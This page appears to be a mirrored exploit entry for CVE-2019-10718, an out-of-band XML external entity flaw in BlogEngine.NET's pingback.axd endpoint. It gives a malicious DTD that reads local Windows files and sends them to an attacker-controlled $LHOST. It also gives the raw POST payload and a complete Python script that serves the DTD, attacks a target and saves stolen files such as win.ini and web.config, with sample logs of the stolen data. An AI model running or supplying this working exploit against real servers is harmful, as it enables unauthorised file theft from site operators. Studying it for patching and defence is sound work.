扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 |
# Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET # Date: 19 June 2019 # Exploit Author: Aaron Bishop # Vendor Homepage: https://blogengine.io/ # Version: v3.3.7 # Tested on: 3.3.7, 3.3.6 # CVE : 2019-10718 #1. Description #============== #BlogEngine.NET is vulnerable to an Out-of-Band XML External Entity #Injection attack on **/pingback.axd**. #2. Proof of Concept #============= #Host the following malicious DTD on a web server that is accessible to the #target system: #~~~ #<!ENTITY % p1 SYSTEM "file:///C:/Windows/win.ini"> #<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://$LHOST/X?%p1;'>"> %p2 #~~~ #Submit a request to <code>pingback.axd</code> containing a malicious XML body: #~~~{command="REQUEST"} #POST /pingback.axd HTTP/1.1 #Host: $RHOST #Accept-Encoding: gzip, deflate #Connection: close #User-Agent: python-requests/2.12.4 #Accept: */* #Content-Type: text/xml #Content-Length: 131 #<?xml version="1.0"?> #<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd"> #<foo>&e1;</foo> #<methodName>pingback.ping</methodName> #~~~ #The application will request the remote DTD and submit a subsequent request #containing the contents of the file: #~~~ #$RHOST - - [17/May/2019 12:03:32] "GET /ex.dtd HTTP/1.1" 200 - #$RHOST - - [17/May/2019 12:03:32] "GET #/X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1 #HTTP/1.1" 200 - #~~~ #! /usr/bin/env python3 import argparse import http.server import json import multiprocessing import os import re import requests import sys import time import urllib """ Exploit for CVE-2019-10718 CVE Identified by: Aaron Bishop Exploit written by: Aaron Bishop Submit a XML to the target, get the contents of the file in a follow up request from the target python3 CVE-2019-10718.py --rhost http://$RHOST --lhost $LHOST --lport $LPORT --files C:/Windows/win.ini C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config C:/inetpub/wwwroot/iisstart.htm C:/Windows/iis.log C:/Users/Public/test.txt Requesting C:/Windows/win.ini ... $RHOST - - [16/May/2019 17:07:25] "GET /ex.dtd HTTP/1.1" 200 - $RHOST - - [16/May/2019 17:07:25] "GET /X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1 HTTP/1.1" 200 - Requesting C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config ... $RHOST - - [16/May/2019 17:07:26] "GET /ex.dtd HTTP/1.1" 200 - Unable to read C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config Requesting C:/inetpub/wwwroot/iisstart.htm ... $RHOST - - [16/May/2019 17:07:30] "GET /ex.dtd HTTP/1.1" 200 - Unable to read C:/inetpub/wwwroot/iisstart.htm Requesting C:/Windows/iis.log ... $RHOST - - [16/May/2019 17:07:34] "GET /ex.dtd HTTP/1.1" 200 - Unable to read C:/Windows/iis.log Requesting C:/Users/Public/test.txt ... $RHOST - - [16/May/2019 17:07:38] "GET /ex.dtd HTTP/1.1" 200 - $RHOST - - [16/May/2019 17:07:38] "GET /X?This%20is%20a%20test HTTP/1.1" 200 - """ xml = """<?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://{lhost}:{lport}/ex.dtd"> <foo>&e1;</foo> <methodName>pingback.ping</methodName> """ dtd = """<!ENTITY % p1 SYSTEM "file:///{fname}"> <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://{lhost}:{lport}/X?%p1;'>"> %p2; """ proxies = { "http": "127.0.0.1:8080", "https": "127.0.0.1:8080" } file_queue = multiprocessing.Queue() response_queue = multiprocessing.Queue() response_counter = multiprocessing.Value('i', 0) class S(http.server.SimpleHTTPRequestHandler): server_version = 'A Patchey Webserver' sys_version = '3.1415926535897932384626433832795028841971693993751058209749445923078' error_message_format = 'Donde esta la biblioteca?' def _set_headers(self): self.send_response(200) self.send_header('Content-Type', 'application/xml') self.end_headers() def do_GET(self): if self.path.endswith(".dtd"): self._set_headers() self.wfile.write(dtd.format(fname=file_queue.get(), lhost=self.lhost, lport=self.lport).encode('utf-8')) elif self.path.startswith("/X"): self._set_headers() response_counter.value += 1 response_queue.put(self.path) self.wfile.write('<response>Thanks</response>'.encode('utf-8')) else: self._set_headers() self.wfile.write('<error>?</error>') def start_server(lhost, lport, server): httpd = http.server.HTTPServer((lhost, lport), server) httpd.serve_forever() def main(rhost, lhost, lport, files, timeout, proxy, output_dir): print(output_dir) if not output_dir: return for f in files: file_queue.put_nowait(f) server = S server.lhost, server.lport = lhost, lport p = multiprocessing.Process(target=start_server, args=(lhost,lport,server)) p.start() for num, f in enumerate(files): print("\nRequesting {} ...".format(f)) count = 0 r = requests.post(rhost + "/pingback.axd", data=xml.format(lhost=lhost, lport=lport), proxies=proxies if proxy else {}, headers={"Content-Type": "text/xml"}) response = True while num == response_counter.value: if count >= timeout: response = False response_counter.value += 1 print("Unable to read {}".format(f)) break time.sleep(1) count += 1 if response: os.makedirs(output_dir, exist_ok=True) with open("{}/{}".format(output_dir, os.path.splitdrive(f)[1].replace(':','').replace('/','_')), 'w') as fh: fh.write(urllib.parse.unquote(response_queue.get()).replace('/X?','')) p.terminate() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Exploit CVE-2019-10718 OOB XXE') parser.add_argument('-r', '--rhost', action="store", dest="rhost", required=True, help='Target host') parser.add_argument('-l', '--lhost', action="store", dest="lhost", required=True, help='Local host') parser.add_argument('-p', '--lport', action="store", dest="lport", type=int, required=True, help='Local port') parser.add_argument('-f', '--files', nargs='+', default="C:/Windows/win.ini", help='Files to read on RHOST') parser.add_argument('-t', '--timeout', type=int, default=3, help='How long to wait before moving on to next file') parser.add_argument('-x', '--proxy', dest="proxy", action="store_true", default=False, help='Pass requests through a proxy') parser.add_argument('-o', '--output', nargs='?', default="./CVE-2019-10718", help='Output directory.Default ./CVE-2019-10718') args = parser.parse_args() if isinstance(args.files, str): args.files = [args.files] main(args.rhost, args.lhost, args.lport, args.files, args.timeout, args.proxy, args.output) |
体验盒子
